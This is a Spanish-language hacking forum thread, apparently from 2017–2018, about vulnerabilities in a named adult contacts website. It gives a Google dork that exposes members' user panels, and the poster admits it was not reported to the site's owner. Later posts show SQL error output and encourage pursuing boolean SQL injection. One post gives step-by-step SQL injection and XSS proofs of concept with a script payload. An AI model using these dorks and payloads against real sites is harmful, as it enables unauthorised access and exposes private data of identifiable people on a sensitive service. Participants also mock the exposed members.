[Google Hacking] Leak de Britishsexcontacts!!!

en: Marzo 23, 2017, 11:22:40 pm

Hola Gente. Si bien este fallo no es por sqli o xss. No deja de ser un bug de configuración del server al momento de ser indexado!!!.
Se explota con un simple Dork como este:

site:britishsexcontacts.com/ inurl:members

Lo cual nos permite acceder al panel de users de todos los miembros de esta pagina }:)
Aqui va un link:

You are not allowed to view links. Register or Login

No lo he reportado todavia al admin!!!.

Saludos y no se haz malos!!!.

en: Marzo 24, 2017, 12:22:58 pm

No podías utilizarlo en una floristería o en una empresa de oficinas heeee.

en: Marzo 24, 2017, 07:58:56 pm

jajaja muy buena!!!.

en: Marzo 28, 2017, 06:08:29 pm

You are not allowed to view links. Register or Login

No lo he reportado todavia al admin!!!.

Ya entiendo porque

en: Marzo 28, 2017, 09:13:58 pm

Les cuento que jugando un poco con esto consegui un sql error. No lo he tratado de explotar aun

en: Abril 29, 2017, 06:27:11 am

they have fixed it

en: Mayo 31, 2017, 09:16:44 am

You are not allowed to view links. Register or Login

Hola Gente. Si bien este fallo no es por sqli o xss. No deja de ser un bug de configuración del server al momento de ser indexado!!!.
Se explota con un simple Dork como este:

site:britishsexcontacts.com/ inurl:members

Lo cual nos permite acceder al panel de users de todos los miembros de esta pagina }:)
Aqui va un link:

You are not allowed to view links. Register or Login

No lo he reportado todavia al admin!!!.

Saludos y no se haz malos!!!.

bueniisimo el dork encontrado máquina, nos hemos hechado unas risas muy buenas cuando se lo he enseñado a unos colegas

Un saludo!

en: Mayo 31, 2017, 06:15:33 pm

You are not allowed to view links. Register or Login

Citar
bueniisimo el dork encontrado máquina, nos hemos hechado unas risas muy buenas cuando se lo he enseñado a unos colegas

Un saludo!

Gracias. Un saludo capo!. Y esperamos tus aportes!!!.

en: Mayo 27, 2018, 09:16:28 pm

Pues practicando un poquito de lo leído en el foro de XSS me han surgido unos Warning en el apartado de logueo y recuperar password ... o.O

Citar

Password Retrieval

Sorry, the email address ' was not found on our system

Click here to try again.

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 25

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 26

en: Mayo 30, 2018, 10:05:21 pm

You are not allowed to view links. Register or Login

Pues practicando un poquito de lo leído en el foro de XSS me han surgido unos Warning en el apartado de logueo y recuperar password ... o.O

Citar
Password Retrieval

Sorry, the email address ' was not found on our system

Click here to try again.

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 25

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/vhosts/britishsexcontacts.com/www/Forgotten.php on line 26

Posiblemente vulnerable a sqli con booleanos, sigue por ese camino

en: Junio 09, 2018, 09:19:25 pm

Mientras jugaba con tu dork, me di cuenta que britishsexcontacts[.]com es vulnerable a SQL INJECTION y XSS

--> SQL INJECTION
You are not allowed to view links. Register or Login'

[!] ERROR SQL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 1' at line 1
SELECT Filename, Filename_Private FROM qdgirls WHERE ID = 47486' LIMIT 1;

-->XSS y SQL INJECTION
PoC_1

1.- En la pagina principal (You are not allowed to view links. Register or Login) esta un apartado para realizar busquedas (quiero creer que de usuarios)
2.- Una vez identificado esta seccion ponemos una comilla simple ' y nos notificara el error SQL, el cual puede nos permite realizar una inyeccion
3.- En este mismo apartado ingresamos el payload de javascript '"><script>alert(/X/)</script> y nos levatara el alert

:3

--> XSS
PoC
1.- ingresamos a la pagina principal (You are not allowed to view links. Register or Login)
2.- Ya una vez dentro de la pagina, a la URL le agregamos /'"><script>alert(/X/)</script> para que nos quede de la siguiente forma: You are not allowed to view links. Register or Login'"><script>alert(/X/)</script> y listo

Queres que tu bug aparezca en Hacking ShowOff? Iniciado por ANTRAX	Respuestas: 0 Vistas: 6839	Enero 17, 2013, 09:35:15 am por ANTRAX
Hacking en User agent Iniciado por v4char	Respuestas: 0 Vistas: 1980	Noviembre 19, 2015, 08:37:26 pm por v4char
XSRF + Cross Site Framing en Google Iniciado por Dedalo	Respuestas: 6 Vistas: 3890	Agosto 24, 2013, 11:16:05 am por Fabián Cuchietti
Múltiples XSS en Google (sandboxed) Iniciado por Fabián Cuchietti	Respuestas: 0 Vistas: 1808	Agosto 21, 2013, 03:27:39 pm por Fabián Cuchietti
[Open Redirect]Google Iniciado por sadfud	Respuestas: 2 Vistas: 2889	Julio 20, 2017, 06:32:45 pm por sadfud

Underc0de - Hacking y seguridad informática

[Google Hacking] Leak de Britishsexcontacts!!!

Rootkit_Pentester